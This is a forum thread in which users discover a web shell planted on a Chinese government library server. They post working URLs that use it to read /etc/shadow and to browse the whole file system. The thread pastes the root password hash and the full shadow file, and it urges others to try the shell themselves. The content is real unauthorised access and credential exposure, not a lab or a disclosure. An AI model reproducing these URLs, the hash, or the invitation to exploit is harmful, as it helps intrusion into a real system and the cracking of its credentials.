.

especially as it is no md5-hash, I think this is DES

thanks for this site .... perhaps its an chinese challenge site for bureaucrats I can't imagine that this would work for a non-challenge site which is made by a halfway competent webmaster


edit: hmm .... seems as if somebody has uploaded a skript he didn't know what it was ... it seems as if i can browse through all files on this server..
edit2: it even seems as if you could edit files there .... realy strange...

it is an md5 hash, it's the BSD md5 algo

that's the definition for the $1

maybe in the shadow file...
[http://portal.sdxlib.gov.cn/xkdh/upload/4F3ED6E10CF3ECED.jsp?sort=1&editfile=%2Fetc%2Fshadow]

root:$1$omN0zmQV$dD5uC.bf8raQLvckICm/q0:13694:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::

Being a gov site doesn't mean it's secure, unless it's the ministry of defense or the likes
But don't you know the whole file system is browsable: http://portal.sdxlib.gov.cn/xkdh/upload/4F3ED6E10CF3ECED.jsp?sort=1&dir=%2F
Give it a try, guys
Update: maybe you guys want to see the homepage: http://portal.sdxlib.gov.cn/

Yeah it's pretty bad, seing as google already knows ( i stumbled upon it because I googled for something that happened to be in one of the documentation of some program, that was installed. didn't have time to fully analyse it.

this is why i never get any work done, a simple google all to often brings me across something that's just too bad to ignore

it had to be tomcat ofcourse, java ...

They really should have labelled it "Not suitable for noobs"

http://portal.sdxlib.gov.cn/ is A library site for people who learning political affairs.Now this site is moved.The reason is lack management mostly.